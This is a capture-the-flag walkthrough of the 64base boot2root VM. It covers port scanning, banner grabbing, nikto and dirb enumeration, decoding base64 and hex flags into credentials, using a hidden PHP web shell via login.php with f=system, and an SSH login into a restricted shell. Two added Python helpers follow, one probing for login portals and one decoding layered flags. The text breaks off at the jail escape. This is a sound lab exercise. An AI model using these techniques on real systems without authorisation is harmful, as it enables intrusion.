The Complete Walkthrough - ȜӎŗgͷͼȜ

Lord Vader

Many of you have emailed both thanking me for creating this boot2root challenge, and asking for a full walkthrough in order to aid their learning. So, here is a complete and full walkthrough as I imagined people might have solved the challenge as I created it. This is not to say there aren’t other equally valid ways in which someone could approach and solve this boot2root challenge.

Anyway, I hope people had fun in their efforts battling the Dark Side. ;D

Discovering the IP of the VM

So, after making sure the VM's network adapter is on the same subnet as my Kali VM and booting it up in VirtualBox, I use the netdiscover command to find its IP address:

root@kali:~# netdiscover -r 172.16.0.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts
  
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 172.16.0.1      52:54:00:12:35:00      1      60  Unknown vendor
 172.16.0.2      52:54:00:12:35:00      1      60  Unknown vendor
 172.16.0.3      08:00:27:33:c6:5c      1      60  PCS Systemtechnik GmbH
 172.16.0.19     08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH 
 

I know Kali is using 172.16.0.3, and the .1 and .2 entries sharing a single MAC are the virtual network's own infrastructure, so let's have a look at 172.16.0.19


Scanning For Open Ports

Next we use nmap to scan the full TCP port range for any open ports/services on 172.16.0.19

root@kali:~# nmap 172.16.0.19 -p-

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-08 17:30 EST
Nmap scan report for 172.16.0.19
Host is up (0.00048s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
4899/tcp  open  radmin
62964/tcp open  unknown
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)

We have discovered 4 open ports :D

However, don't forget I described this challenge as "Designed To TROLL You!"

A quick banner grab of each of these apparently open services using the nc command reveals a bit more information. (Grabbing banners by hand, rather than trusting nmap's service names, is what exposes the fakes below.)

Port 22 (SSH?)

root@kali:~# nc -nv 172.16.0.19 22
(UNKNOWN) [172.16.0.19] 22 (ssh) open
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001

#

^C

Hmnnn, ;D

A root SSH session over netcat into a Fedora system, last logged into in the year 4025 from the IP address 010.101.010.001?

You got me! It's a pure TROLL! I added it in just to make people smile tbh.

I expected here people may get drawn into trying to decipher some kind of cryptic clue or perceived StarWars reference.

A sensible approach would be to copy off all the words into a wordlist for use later when enumerating files/directories/usernames/passwords etc.

However, as I just said, this one was just a troll and nothing more. LOLZ

Port 80 (http?)

root@kali:~# nc -nv 172.16.0.19 80
(UNKNOWN) [172.16.0.19] 80 (http) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 14 Dec 2016 22:03:42 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
ETag: "1fdf-542f6bd9b68a0"
Accept-Ranges: bytes
Content-Length: 8159
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


A legitimate Apache webserver running on Debian.

We’ll come back to this shortly…

Port 4899 (radmin?)

root@kali:~# nc -nv 172.16.0.19 4899
(UNKNOWN) [172.16.0.19] 4899 (radmin-port) open
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________


^C


OK, we have some ASCII art and some possible clues/red herrings. As you can see there is a line of text at the top of the output (sshhh! ssh! droids!) followed by 55 empty lines. Clearly, I designed this to push the 1st line of the file off the top of most people's terminal window. (Sneaky I know :D) Piping a banner into a file, or through head, is the easy way to catch this kind of thing.

Once again, the words can be saved off into a wordlist for use later perhaps.

Only mildly troll-like in this case.

Port 62964 (unknown?)

root@kali:~# nc -nv 172.16.0.19 62964
(UNKNOWN) [172.16.0.19] 62964 (?) open
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

^C

A legit SSH server (OpenSSH_6.7p1, the Debian jessie package) is running here.

I expect people used the usual tools such as hydra & ncrack here to try and brute force various user/password combos based on StarWars character names with a wordlist of StarWars scripts/trivia text.

Again, a sensible approach, but in this case it will give you nothing. (I am evil yes ;D)


A Deeper Look at The Website

Browsing to http://172.16.0.19/ we are presented with the ramblings of the dark lord himself.

[Screenshot omitted: the landing page]

Hmnn.. dmlldyBzb3VyY2UgO0QK right in the middle of the landing page. What could that be I wonder?

root@kali:~# echo dmlldyBzb3VyY2UgO0QK|base64 -d
view source ;D

View source it says…

OK, let's pull down any HTML comments using the curl command combined with grep

root@kali:~# curl http://172.16.0.19/|grep '!'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8159  100  8159    0     0  10.3M      0 --:--:-- --:--:-- --:--:-- 7967k
<!DOCTYPE html>
    <!-- Bootstrap Core CSS -->
    <!-- Theme CSS -->
    <!-- Custom Fonts -->
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <![endif]-->
    <!-- Navigation -->
            <!-- Brand and toggle get grouped for better mobile display -->
            <!-- Collect the nav links, forms, and other content for toggling -->
            <!-- /.navbar-collapse -->
        <!-- /.container -->
    <!-- Page Header -->
    <!-- Set your background image for this header on the line below. -->
             <!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
    <!-- Main Content -->
                <!-- Pager -->
    <!-- Footer -->
    <!-- jQuery -->
    <!-- Bootstrap Core JavaScript -->
    <!-- Contact Form JavaScript -->
    <!-- Theme JavaScript -->

That's an awfully long string of numbers and lowercase letters (only 0-9 and a-f in fact, which is the giveaway for hex).

Let's see if we can decode it in any way.

root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
> 56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
> a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r
ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
> 56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
> a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r|base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

So it turned out to be hex data containing a base64 string then.

We just found flag1: flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}.

That was pretty easy! Right? Let's see what its value decodes to as well.

root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
> 56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
> a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r|base64 -d|cut -d{ -f2|cut -d} -f1|base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Nice, we have what look like some creds: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4.

But sadly... work'ey no for SSH'ey :(

Oh well, saved for later I guess at this stage. ;D

Further enumeration of Darth Vader’s Blog reveals an interesting post he’s published.

[Screenshot omitted: the blog post]

An entertaining read (full of clues and trolls indeed).

A section at the bottom of the wanted poster image looks like a possible clue.

[Screenshot omitted: the wanted poster]

The image says:

IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377.

and the comment below it says:

Only respond if you are a real Imperial-Class BountyHunter

Red Herrings or Clues? You decide…

Noted down for later.


Automating Site Enumeration

So, we know there is quite a lot of very specific text contained within the content of the site. There are a few different things we can do from here. Let’s start with a bit more scanning.

Website Scanning

A commonly used tool for doing a basic vulnerability scan of a website is the command line tool nikto

lets give it a shot then…

root@kali:~# nikto -host "http://172.16.0.19/" -Display V
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.0.19
+ Target Hostname:    172.16.0.19
+ Target Port:        80
+ Start Time:         2016-12-14 23:32:04 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~

+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
- STATUS: Completed 1500 requests (~22% complete, 14 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 2000 requests (~29% complete, 15 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 2500 requests (~36% complete, 12 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
- STATUS: Completed 3000 requests (~43% complete, 10 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 3500 requests (~50% complete, 9 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3268: /manual/images/: Directory indexing found.
- STATUS: Completed 4000 requests (~58% complete, 7 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
- STATUS: Completed 4500 requests (~65% complete, 6 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 5000 requests (~72% complete, 5 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 5500 requests (~79% complete, 3 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 6000 requests (~87% complete, 2 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 6500 requests (~94% complete, 1 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 7000 requests: currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 8000 requests: currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-14 23:32:19 (GMT0) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


As you can see, this generates a lot of output with many false positives.

"robots.txt" contains 429 entries which should be manually viewed

YIKES! How might we "separate the wheat from the chaff", so to speak? (Nikto only tells us that an entry like /88888/ answered 200; it can't tell us whether that is a real directory or more chaff, so every one of those 429 entries would need checking by hand.)

Let's try another approach.

Now, earlier on we found what look like a set of credentials. However, they didn't work for SSH.

If we consider the way they're presented as a colon separated string, they look like possible HTTP 'basic auth' creds: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 (a browser, or curl -u, base64 encodes exactly that "user:password" string into the Authorization header).

Maybe there is a login page somewhere hidden on the web server. We can easily automate finding such a login page using the command line web brute force enumeration tool dirb (with its default common.txt wordlist to begin with).

If we know we are only interested in server responses indicating a login portal we can combine it with grep to filter the results down to only those returning a 401 Unauthorized response code.

root@kali:~# dirb http://172.16.0.19/ |grep CODE:401
+ http://172.16.0.19/admin (CODE:401|SIZE:458)

We have a hit, and visiting it in the browser confirms it’s asking for credentials.

[Screenshot omitted: the /admin login prompt]

Let’s test the creds from flag1 using curl

root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4'\
> -s http://172.16.0.19/admin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 172.16.0.19 Port 80</address>
</body></html>

But, still no dice...

... Remembering back, there was a hint in the blog post about a "Secret 5h377" and some other info.

It's certainly sensible to try to enumerate in a much more targeted way.

Here I expect people may have started parsing and processing StarWars movie scripts and the like to create custom wordlists for use in cracking the SSH login and enumeration of the website. I could have done that to you. But, I promise, all the clues and information are self contained in the VM itself.

With this in mind lets move on…


Creating a Custom Wordlist

In this case we’ll keep it super simple by recursively copying all content from the blog, including the robots.txt, HTML and JavaScript. Using wget with the right flags allows us to dump this all into a single file. Then we can use the tools html2dic and sort to clean it up and convert it to a useable wordlist.

root@kali:~# wget http://172.16.0.19/ -rq -O 64base-html.out
root@kali:~# ls -al 64base-html.out 
-rw-r--r-- 1 root root 1869208 Dec  6 01:39 64base-html.out

root@kali:~# html2dic 64base-html.out | sort -u > 64base-html.dict
root@kali:~# wc -l 64base-html.dict 
12845 64base-html.dict

Now we can use this list to re-try the web login enumeration using dirb once more.

root@kali:~# dirb http://172.16.0.19/ 64base-html.dict | grep CODE:401
+ http://172.16.0.19/admin (CODE:401|SIZE:458)
+ http://172.16.0.19/Imperial-Class (CODE:401|SIZE:458)


Bingo! At /Imperial-Class the creds now work and we are granted access to a new area of the site.
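The three web steps above (nikto's "review robots.txt by hand", dirb piped through grep CODE:401, and curl -u with the flag1 creds) are one small loop once you see them as code. As an added example (not code from the walkthrough or the VM), here it is in Python, run against a constructed stand-in server on loopback that behaves the way the 64base site did: open paths answer 200, protected paths answer 401 until the right Basic credentials arrive, and robots.txt is mostly chaff. The stand-in's path list, the /admin/ credential pair and the robots.txt contents are made up for the demo; the /Imperial-Class/ credential pair is the one decoded from flag1.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the 64base web root; it is not the real VM.
# Paths that answer 200 without credentials.
OPEN_PATHS = {"/", "/img/", "/robots.txt"}
# Paths behind HTTP Basic auth, mapped to the "user:password" they accept.
# /Imperial-Class/ takes the pair decoded from flag1; /admin/ gets a made-up
# pair so that, as in the walkthrough, the flag1 creds are rejected there.
PROTECTED_PATHS = {
    "/admin/": "vader:not-the-flag1-password",
    "/Imperial-Class/": "64base:Th353@r3N0TdaDr01DzU@reL00K1ing4",
}
# A robots.txt in the spirit of the challenge: ten chaff entries, one real one.
ROBOTS_TXT = "User-agent: *\n" + "".join(
    f"Disallow: /{n}/\n" for n in range(88880, 88890)) + "Disallow: /Imperial-Class/\n"


def basic_auth_value(creds):
    """Encode a 'user:password' string the way a browser or curl -u does."""
    return "Basic " + base64.b64encode(creds.encode()).decode()


class VaderHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        path = self.path.split("?", 1)[0]
        if "." not in path.rsplit("/", 1)[-1]:      # treat /admin and /admin/ alike
            path = path.rstrip("/") + "/"
        if path in OPEN_PATHS:
            body = ROBOTS_TXT if path == "/robots.txt" else "<html>ramblings of the dark lord</html>"
            self._reply(200, body)
        elif path in PROTECTED_PATHS:
            if self.headers.get("Authorization") == basic_auth_value(PROTECTED_PATHS[path]):
                self._reply(200, "<!-- don't forget the BountyHunter login -->")
            else:
                self._reply(401, "Unauthorized", {"WWW-Authenticate": 'Basic realm="64base"'})
        else:
            self._reply(404, "Not Found")

    def _reply(self, status, body, extra_headers=None):
        data = body.encode()
        self.send_response(status)
        for name, value in (extra_headers or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass                                         # keep the demo quiet


def start_server():
    """Serve the stand-in on a free loopback port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), VaderHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(host, port, path, creds=None):
    """One GET, optionally with Basic credentials; returns (status, body)."""
    headers = {"Authorization": basic_auth_value(creds)} if creds else {}
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


def robots_paths(host, port):
    """The Disallow targets of robots.txt: the entries nikto told us to review by hand."""
    status, body = fetch(host, port, "/robots.txt")
    if status != 200:
        return []
    return [line.split(":", 1)[1].strip() for line in body.splitlines()
            if line.lower().startswith("disallow:")]


def probe(host, port, paths, creds=None):
    """Status code per candidate path; with creds this is the 'curl -u' step."""
    return {p: fetch(host, port, p, creds)[0] for p in paths}


def login_portals(host, port, paths):
    """Only the paths that demand credentials: 'dirb ... | grep CODE:401' in code."""
    return sorted(p for p, s in probe(host, port, paths).items() if s == 401)


if __name__ == "__main__":
    srv = start_server()
    host, port = srv.server_address
    candidates = ["/", "/admin/", "/img/", "/staff/"] + robots_paths(host, port)
    portals = login_portals(host, port, candidates)
    print("401 portals:", portals)
    print("with the flag1 creds:", probe(host, port, portals, PROTECTED_PATHS["/Imperial-Class/"]))
    srv.shutdown()
```

Against a real target you would point fetch() at the VM instead of the stand-in and feed login_portals() the wordlist built from the site itself; the point of filtering on 401 first is that credential attempts only go to the handful of paths that actually challenge for them.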

[Screenshot omitted: the custom error message at /Imperial-Class/]

But, We are presented with some kind of custom error message.

pulling down the source code using curl reveals a bit more info once again.

root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4'\
> -s http://172.16.0.19/Imperial-Class/
<!DOCTYPE html>
<html lang="en">
<body bgcolor=#000000><font color=#cfbf00>
<title>64base - login</title>
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
<!-- don't forget the BountyHunter login -->

Another clue. Where could the BountyHunter Login be. Again, remembering back to the clues in the blog post, there was a comment beneath the wanted poster image.

“Only respond if you are a real Imperial-Class BountyHunter”

After not too long this should lead us to:

http://172.16.0.19/Imperial-Class/BountyHunter/

[Screenshot omitted: the BountyHunter login form]

Oh my, yet another login. TROLLOLLOLOLOOL!

Having a look at the page source initially reveals very little.

[Screenshot omitted: the login form's page source]

The login button looks like it is posting the creds entered in the form to a php file, ./login.php, which then redirects us back to index.php.

Viewing the response in the Network tab of Firefox's developer tools shows us as much.

[Screenshot omitted: the Firefox Network tab]

However, this is where we need to start paying close attention to how the form functions. As many of you may have noticed in the url bar, we started off in the default root of the /BountyHunter/ web directory. Now we are directly accessing /BountyHunter/index.php.

At first glance this looks the same. But it's not when we view the source of the response.

[Screenshot omitted: the source of the index.php response]

Goody gum drops, more alphanumeric strings like the one we found that contained flag1. Let's "string" 'em all together (pun intended) and try to decode it:

root@kali:~# echo 5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756\
> 584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32\
> 52714d544a54626d51315a45566157464655614446525557383966516f3d0a\
> |xxd -p -r|base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

We have flag2 at last! flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

Let’s decode its contents too then.

root@kali:~# echo aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=|base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA

A video clue this time.
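The hex-then-base64 peeling done by hand for flag1, and again just now for flag2, is mechanical enough to automate. As an added example (not code from the walkthrough), here is a small Python decoder that strips one encoding layer at a time, stops as soon as the data no longer looks encoded or stops being printable text, and, if a flagN{...} turns up, peels the value inside the braces as well. The detection is a heuristic: every hex string is also made of valid base64 characters, so hex is tried first, and a short all-hex word like "deadbeef" stops the loop only because its bytes are not printable.

```python
import base64
import binascii
import re

# Added example: automates the hex -> base64 -> flagN{...} -> base64 chain.
HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
FLAG_RE = re.compile(r"(flag\d+)\{([^}]*)\}")


def looks_textual(data):
    """True when the decoded bytes are printable UTF-8 (tabs/newlines allowed)."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def decode_once(token):
    """Strip one layer: hex if it can be hex, else base64, else None.
    Hex is tried first because hex strings are also valid base64 alphabet."""
    token = token.strip()
    if len(token) >= 2 and len(token) % 2 == 0 and HEX_RE.fullmatch(token):
        return binascii.unhexlify(token)
    if len(token) >= 4 and len(token) % 4 == 0 and B64_RE.fullmatch(token):
        try:
            return base64.b64decode(token, validate=True)
        except binascii.Error:
            return None
    return None


def peel(token, max_depth=8):
    """Decode layer after layer while the result still looks like encoded text.
    Returns every layer, the original token first."""
    layers = [token]
    for _ in range(max_depth):
        raw = decode_once(layers[-1])
        if raw is None or not looks_textual(raw):
            break
        layers.append(raw.decode("utf-8"))
    return layers


def solve(token):
    """Peel a token; if a flagN{value} appears, peel the value too.
    Returns (flag_name, flag_value, decoded_value), or (None, None, last_layer)."""
    outer = peel(token)
    match = FLAG_RE.search(outer[-1])
    if not match:
        return None, None, outer[-1].strip()
    name, value = match.group(1), match.group(2)
    return name, value, peel(value)[-1].strip()


if __name__ == "__main__":
    # The flag1 hex string as it appears in the page's HTML comment.
    flag1_hex = ("5a6d78685a7a4637546d705361566c59546d785062464a76545870566"
                 "56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5"
                 "a77596d316a4d454e6e5054313943673d3d0a")
    print(solve(flag1_hex))
```

Each layer is kept so you can see where a chain stops; the same function handles the flag2 comment, and it refuses to "decode" plain words such as the landing page's decoded "view source ;D".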

[Screenshot omitted: the video]

A little hint to use Burp.

Let's have another look at the login form functionality using that then, first making sure Burp's proxy is set to intercept server responses as well as requests.

[Screenshot omitted: Burp]

[Screenshot omitted: Burp]

Coolio, we now have flag3!

See, the interesting thing is that, while we did use Firefox's web developer tools to figure out how the login form seemed to work, the response from login.php appeared blank because the browser followed the redirect straight away and never rendered the plain text sitting in that response body.

Of course, we didn't really need Burp to grab this flag. We already knew it existed in the /Imperial-Class/BountyHunter/ web directory and could easily have grabbed it with curl too (curl doesn't follow redirects unless you ask it to with -L, so the body is right there).

So let's use that to grab flag3 and decode it.

root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4'\
> -s http://172.16.0.19/Imperial-Class/BountyHunter/login.php\
> | grep flag|cut -d{ -f2|cut -d} -f1|base64 -d


The Secret 5h377

“Secret 5h377” Let’s try it out.

[Screenshot omitted: login.php?f=exec&c=id]

Hmnn, it has the look of a PHP web shell, but trying a few different commands other than id yields nothing.

However, remember the clue from the wanted poster image?

IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377

Let’s try that instead then.

[Screenshot omitted: login.php with f=system]

Sweet! We are executing some system commands via php.

So now we have flag4 and the apparent ability to execute commands as the 64base user account. Interesting.

From here there is more than one way to proceed (as of ver:1.0.1).

NOTE: Originally, the challenge had the web directory permissions set in such a way as to restrict the ability to write files in the web path as well as to disallow execution of certain binaries. I decided to allow these in version 1.0.1 of the challenge in order to make it a little easier from this point on.

So, let’s decode flag4 then.

root@kali:~# echo NjRiYXNlOjY0YmFzZTVoMzc3Cg==|base64 -d
64base:64base5h377

Some more creds. But they don't work for anything.

Hmnn, what's the challenge called? And what tool does it keep relying on?

Yup, base64

Let's use that to encode the password from flag4, 64base5h377.

root@kali:~# echo 64base5h377|base64
NjRiYXNlNWgzNzcK

Which works for SSH. (Note that echo adds a trailing newline and that newline gets encoded too; it's why the string ends in K rather than =, and the password sshd accepts is the full 16-character string above. echo -n would have given you NjRiYXNlNWgzNzc= instead.)

root@kali:~# ssh 64base@172.16.0.19 -p 62964
64base@172.16.0.19's password: 

Last login: Sat Dec 17 15:13:16 2016 from 172.16.0.3
64base@64base:~$

But, it’s a restricted shell

64base@64base:~$ id
-rbash: id: command not found
64base@64base:~$ netstat
-rbash: netstat: command not found
64base@64base:~$ ls -al
well_done_:D
64base@64base:~$ pwd
/64base
64base@64base:~$ cat well_done_\:D
 _           
 \\                                                       
  \\_          _.-._                
   X:\        (_/ \_)         
   \::\       ( ==  )          
    \::\       \== /          
   /X:::\   .-./`-'\.--.       
   \\/\::\ / /     (    l      
    ~\ \::\ /      `.   L.      
      \/:::|         `.'  `     
      /:/\:|         `(    `.    
      \/`-'`.          >    )     
             \       //  .-'     
              |     /(  .'        
              `-..-'_ \  \        
              __||/  \ `-'          
             / _ \ #  |            
            |  #  |#  |           
         LS |  #  |#             
                                 
    BioTronics Security Droid 
64base@64base:~$ 

Breaking Out Of Jail

Some commands are not recognised and some just print ASCII art of Imperial droids and vehicles!

64base@64base:~$ less  well_done_\:D
               .------.
              .'::::::' `.
              |: __   __ |
              | <__] [__>|     
              `-.  __  .-'                       
                | |==| |                      
                | |==| |                     
             __.`-[..]-'\__             
      _.--:""      ||   _``:::--._   
     | |  |.      .:'  (o) ::|  | |       
     |_|  |::..  // _       :|  |_|              
      ===-|:''' // /.\       |-===\       
      |_| `:___//_|[ ]|_____.' |_| )        
      l=l   |\V/_=======_==|   l=l/          
    .-l=l   |`'==/=="======|  /|.:        
    | l l   |=="======\=_==| `-T l      
    `.l_l   |==============|   l_l        
      [_]  [__][__]____[_]__]  [_]     
      \\\ .'.--.- --   --. .`. |||.
      \\\\| |  |    |    |  || |||| 
       \\\\   .'    |    |  |`.||||
        \\\\  | LS  |    `.   |||||

              Medical Droid

64base@64base:~$ grep -v '¬' well_done_\:D
                ________
           _,.-Y  |  |  Y-._
       .-~"   ||  |  |  |   "-.
       I" ""=="|" !""! "|"[]""|     _____
       L__  [] |..------|:   _[----I" .-{"-.
      I___|  ..| l______|l_ [__L]_[I_/r(=}=-P
     [L______L_[________]______j~  '-=c_]/=-^
      \_I_j.--.\==I|I==_/.--L_]
        [_((==)[`-----"](==)j
           I--I"~~"""~~"I--I
           |[]|         |[]|                
           l__j         l__j                             
           |!!|         |!!|                           
           |..|         |..|                            
           ([])         ([])                         
           ]--[         ]--[                             
           [_L]         [_L]  -Row                        
          /|..|\       /|..|\                   
         `=}--{='     `=}--{='              
        .-^--r-^-.   .-^--r-^-.             
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
          ->Imperial AT-AT<- 

64base@64base:~$ find / -name flag5*
           __________        
       _xXXXXXXXXXXXXXXXx_
     .-         |         -.         
   _/___________|___________\_
  /             |       __    \
 / _____________|      /__\    \
/               |      \__/     \    
|               |               |      
 HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH    
|           |   |  ___   ___    |       
\           |   | |== | |==/    /         
 \__________|   | |__| |__/    /      
  \_________|___|_____________/ 
    \           |      /    / 
     `-_________|_____/___-'
            \. \|/ ./
              `-+-'
                I
               [ ]
       LS   |==| |==]]
               `-'

   Cybot Galactica's AC1 "Spy-Eye"
         Surveillance Droid
                            
64base@64base:~$ python -V
           ____
          / ___\
         |: =O =O
         |:: __ |
          \_/LLL\
    __ __./:__:\.__ __
   (%%i \ |<__>| / i%%)
   |--|:/\/ :: \/\:|--|
   |  |:  :====:  :|  |
  .':.'Y-" |::| "-Y`.:`.
  |__| | : |__|.-.| |__|
  (%%) | : /++\`-'! (%%)
   \  \|n._\++/_.n| /  /
    \ xT::::--::::T/  /
     \Xl-. `""' .-lXX'
       |: \    / :|
       |:  i--i  :|
       |:  |  |  :| LS
       |___|  |__;|
       P%%%Y  P%%%Y
       b%%%d  b%%%d   B4 Bodyguard Droid
       |   |  |   |     - Front View -

64base@64base:~$ perl
          ,------.._
         (      o  o)
        _.`--------'
      .~  ~.   . `-.-~~~-.___      ____
      (     )   \       \    ~~~~~~ .--'
    .-~    /     ) ..___.-----------~
   /     > `-._  |/
  (      \     ~~--._
   `-.    \   //     ~~--.
      `-.  ~-.\\ /~-._  /X\
         `-=-._:=--. / |XOX|
     LS    |  |     ~-._\X/
         .--.-~~-.
        / ++| xx |   B-BD1 Battle Droid
       / ++/| xx |     - Side View -
64base@64base:~$ ruby

             _____
